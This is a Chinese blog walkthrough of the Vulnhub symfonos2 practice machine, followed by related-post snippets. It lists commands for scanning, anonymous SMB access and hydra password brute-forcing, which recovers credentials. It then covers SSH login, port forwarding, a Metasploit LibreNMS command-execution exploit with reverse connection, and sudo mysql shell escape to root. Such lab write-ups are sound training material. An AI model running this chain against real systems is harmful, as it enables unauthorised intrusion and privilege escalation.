symfonos2 靶机

已于 2023-11-28 16:06:57 修改
阅读量959 收藏 21
点赞数 29
文章标签: php 开发语言
于 2023-11-28 16:04:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62202418/article/details/134669124
版权

  1. 探测靶机IP
    arp-scan --interface eth1 -l

  2. 扫描靶机开放端口
    nmap -sS -p- 10.1.1.147

    靶机开放了21、22、80、139、445端口

  3. 浏览器访问80 端口

    普通普片,啥也没有

  4. 扫描目录
    dirsearch -u http://10.1.1.147

    没有其他可以访问的路径

  5. 查看共享文件夹

    smbclient -L 10.1.1.147

    发现anonymous共享文件夹

  6. 查看anonymous 文件夹

    smbclient //10.1.1.147/anonymous

  7. 发现一个log.txt 文件,下载下来看一下

    get log.txt

    cat log.txt

    发现了一个叫aeolus 的用户

  8. 知道用户名之后, 可也尝试使用hydra 进行密码爆破

    hydra -l aeolus -U /usr/share/wordlists/rockyou.txt ftp://10.1.1.147

    爆破成功!拿到了账密:aeolus \ sergioteamo

  9. 使用爆破出来的账密进行ssh 登录

    ssh aeolus@10.1.1.147

    登录成功!

  10. 使用SSH登录的情况下会对很多命令有限制

  11. 知道了账号密码,那就使用msf 工具进行SSH登录启动metasploit 工具

    msfconsole

    查找ssh 登录模块

    search ssh_login

  12. 使用第一个
    use 0
    查看一下需要设置那些选项
    show options

  13. 设置目标地址、账号、密码然后运行

    连接成功!

  14. 将sessions 会话升级为一个meterpreter会话 查看sessions 会话

    sessions

  15. 升级会话
    sessions -u 1

    使用第二个会话

  16. 查看网络相关信息
    netstat
    发现8080端口只允许靶机本身连接

  17. 进行端口转发

    将本地的9999端口映射到靶机的8080端口

    ssh -Nf -L 8888:127.0.0.1:8080 aeolus@10.1.1.147 将本地机器的8888端口映射到远程机器的127.0.0.1的8080端口 执行此命令后,本地机器的8888端口将被转发到远程机器的8080端口。你可以通过在本地浏览器中访问http://localhost:8888来访问远程机器上的服务。

  18. 访问一下本地的8888 端口

  19. 发现网站使用的是libreNMS 系统
    使用msf 查看一下该系统是否存在漏洞
    search libreNMS

  20. 发现两个命令执行漏洞
    使用第一个
    use 1
    show options 查看一下需要设置的选项

  21. 需要设置五个参数
    set PASSWORD sergioteamo
    set RHOSTS 127.0.0.1
    set RPORT 8888
    set USERNAME aeolus
    set LHOST 10.1.1.128
    run

  22. 利用成功!切换到Shell 模式
    python -c "import pty;pty.spawn('/bin/bash')"

  23. 提权

    查看一下可以执行哪些特殊权限命令
    sudo -l

  24. 发现可以用root 权限执行mysql

    mysql 提权
    sudo mysql -e '! /bin/sh'

  25. 在家目录查看proof.txt 文件

  26. 完成!

奋斗的马喽
关注
vulnhub- Symfonos 2 (考点:smb & ProFTPD & 端口转发 & librenms & mysql提权)
冬萍子癸水
04-27 625
https://www.vulnhub.com/entry/symfonos-2,331/ nat网络 arp-scan -l 比平常扫出来多的ip就是靶机 nmap 看到21要想到ftp进去找敏感文件。但这里明显提示了proftpd的版本,1.3.5的是有漏洞的。 参考这个类似的靶机joy 22要想到可能的ssh登录或破解 80进web搜集信息 139,445smb进去找敏感文件 PORT ...
Metasploitable2靶机渗透笔记
qq_60600840的博客
07-20 815
metaspolitable靶机、安全、渗透、靶机
Vulnhub靶机 Symfonos 2
菜浪马废的博客
09-25 411
扫出用户名aeolus aeolus:sergioteamo 用来登录ssh试试 转发8080端口 提权成功 先是enum4linux找到用户名 ftp爆破 发现可以用来登录ssh 找到运行的8080端口 ssh端口转发 访问后发现是cms 找到漏洞 得到下一个用户权限 sudo -l找到mysql gtfobins上找到提权方法 得到root权限 ...
symfonos2 打靶渗透
最新发布
m0_65112983的博客
08-05 544
symfonos2 打靶渗透
symfonos2靶机-Walkthrough
ins1ght的博客
09-07 1758
symfonos2靶机展开的一次“渗透测试”。你可以看到一只菜鸟的个人思路、对网上已有Writeup的复现以及中间遇到的一些问题。
symfonos靶机
haha1314的博客
08-10 777
一、 信息收集 存活主机 开放端口 Enum4linux 猜测aeolus可能为用户名 尝试爆破:sergioteamo 登陆 4 转到msf里面 在检查网络相关信息时,发现可疑之处,靶机一直监听其本机的8080端口,且只允许来自靶机自身的连接 这里自然想到利用端口转发,此处利用portfwd端口转发/重定向工具,其集成到metasploit内, 然后访问自己的9000端...
【Vulnhub】之Symfonos2
zg_111的博客
04-20 678
80端口暂时没有发现可利用点,前面nmap扫描发现靶机还开放了smb端口,所以我们使用smbclient工具列出靶机的共享文件夹。发现anonymous共享文件夹,我们使用smbclient打开发现在backups文件夹下有一个log.txt。发现比之前信息收集到的端口多了3306和8080端口,在kali中尝试访问8080无法访问。前面我们在log.txt中拿到用户aeolus,我们使用hydra工具尝试爆破用户密码。刚才信息收集发现靶机开放了22端口,我们使用爆破出来的账密尝试ssh登录。
靶机综合渗透环境(zico2手册).pdf
04-07
靶机综合渗透环境——zico2渗透实战
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix2-WalkThrough 靶机复现 本文将对 Kioptrix2 靶机复现的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,...
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
渗透测试实战5——zico2靶机入侵
浅浅的博客
04-25 1446
一、实验环境 攻击机(Kali):192.168.247.156 靶机(Node):192.168.247.154 二、实验步骤 (一)主动信息收集 1、主机发现 2、端口扫描 目标靶机开放22、80、111、50309端口 3、服务版本信息 (二)端口探测 80端口 1、目录探测 分别使用默认字典和大字典对靶机进行目录探测,探测结果如下: 2、访问...
oscp——symfonos:2
王嘟嘟的博客
01-16 4568
0x00 前言 这个是练习的第5个机子。 目标地址 https://www.vulnhub.com/entry/symfonos-2,331/ 参考文章 https://www.anquanke.com/post/id/182378 https://blog.csdn.net/weixin_44214107/article/details/100587936 0x01 实验 1.信息收集 1.1 ...
OSCP_VULHUB_symfonos-2(失败)
weixin_51387754的博客
02-03 398
OSCP (Offensive Security Certified Professional)是 Offensive Security (该公司开发和维护着 KALI Linux,以下简称 Offsec)推出的体系非常完善,对于非3年以上渗透工作经验人员来说难度非常高,理论兼实操(更重实操),是业界最知名的渗透测试专业证书。
OSCP - symfonos2 writeup
Jiajiajiang_的博客
04-27 515
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/symfonos/symfonos2.7z 发现IP 安装成功后,查找此虚拟机的IP,我使用的是netdiscover nmap SMB 尝试使用SMB服务,使用anonymous用户登录, 有一个log.txt的文件,下载下来 读文件,发现shad...
学习笔记-symfonos2-WalkThrough
人饭子的博客
11-04 214
symfonos2-WalkThrough 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 靶机地址 https://www.vulnhub.com/entry/symfonos-2,331/ Description OSCP-like Intermediate real life based machine designe...
oscp——vulnhub目录总览(提示&知识点总结)
王嘟嘟的博客
03-16 706
0x00 前言 这里记录并且导航已经完成的vulnhub文章,拥有提示以及&知识点总结 0x01 目录 1.Me and My Girlfriend 1 有一部分偏ctf,但是除去ctf部分,当做简单练习足够。 提示 提示一: 修改x-forwarded-for头 提示二: ssh爆破 提示三: sudo -l 知识点 越权 ssh爆破 凡是用户名相同,则密码很大概率相同 sudo -...
AI: Web: 2靶机-Walkthrough
ins1ght的博客
09-20 2326
AI: Web: 2靶机,中等难度靶机。目录爆破工具啊,漏扫工具啊每次还是多用几个,血的教训……
AI: Web: 1靶机-Walkthrough
ins1ght的博客
09-21 5769
AI: Web: 1靶机,中等难度。使用sqlmap进行webshell的上传,感觉个人的思路稍微有点乱,但这篇文章会让你有观看“现场直播”的感觉,我踩过的坑、犯的低级错误、我的选择,你都可以看到。我觉得一篇好的walkthrough不光应该让人看到“修葺”过的完美思路,使用的技术手段,还应该让人看到我犯过的错,我的选择过程。PS:信息收集是王道。Enjoy!!!
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试的实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值